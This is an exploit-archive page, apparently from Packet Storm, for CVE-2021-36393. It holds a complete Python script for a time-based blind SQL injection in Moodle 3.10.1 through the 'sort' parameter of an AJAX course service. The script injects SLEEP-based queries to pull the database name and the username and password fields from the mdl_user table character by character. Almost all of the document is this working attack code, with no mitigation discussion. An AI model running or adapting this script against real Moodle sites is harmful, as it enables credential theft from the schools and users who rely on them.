what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Moodle 3.10.1 SQL Injection

Moodle 3.10.1 SQL Injection
Posted Apr 15, 2024
Authored by Julio Ángel Ferrari

Moodle version 3.10.1 suffers from a remote time-based SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2021-36393
SHA-256 | e3ce711f4b8356d012259f34f7f227e8907a46d0f7af6bb3c35ce4c0de5a0e57

Moodle 3.10.1 SQL Injection

Change Mirror Download
# Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter
# Google Dork:
# Date: 04/11/2023
# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)
# Vendor Homepage: https://moodle.org/
# Software Link:
# Version: 3.10.1
# Tested on: Linux
# CVE : CVE-2021-36393

import requests
import string
from termcolor import colored

# Request details
URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"
HEADERS = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Content-Type": "application/json",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",
"Origin": "http://127.0.0.1:8080",
"Referer": "http://127.0.0.1:8080/moodle/my/",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",
"Connection": "close"
}

# Characters to test
characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"

def test_character(payload):
response = requests.post(URL, headers=HEADERS, json=[payload])
return response.elapsed.total_seconds() >= 3

def extract_value(column, label):
base_payload = {
"index": 0,
"methodname": "core_course_get_enrolled_courses_by_timeline_classification",
"args": {
"offset": 0,
"limit": 0,
"classification": "all",
"sort": "",
"customfieldname": "",
"customfieldvalue": ""
}
}

result = ""
for _ in range(50): # Assumes a maximum of 50 characters for the value
character_found = False
for character in characters_to_test:
if column == "database()":
base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"
else:
base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"

if test_character(base_payload):
result += character
print(colored(f"{label}: {result}", 'red'), end="\r")
character_found = True
break

if not character_found:
break

# Print the final result
print(colored(f"{label}: {result}", 'red'))

if __name__ == "__main__":
extract_value("database()", "Database")
extract_value("username", "Username")
extract_value("password", "Password")


Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close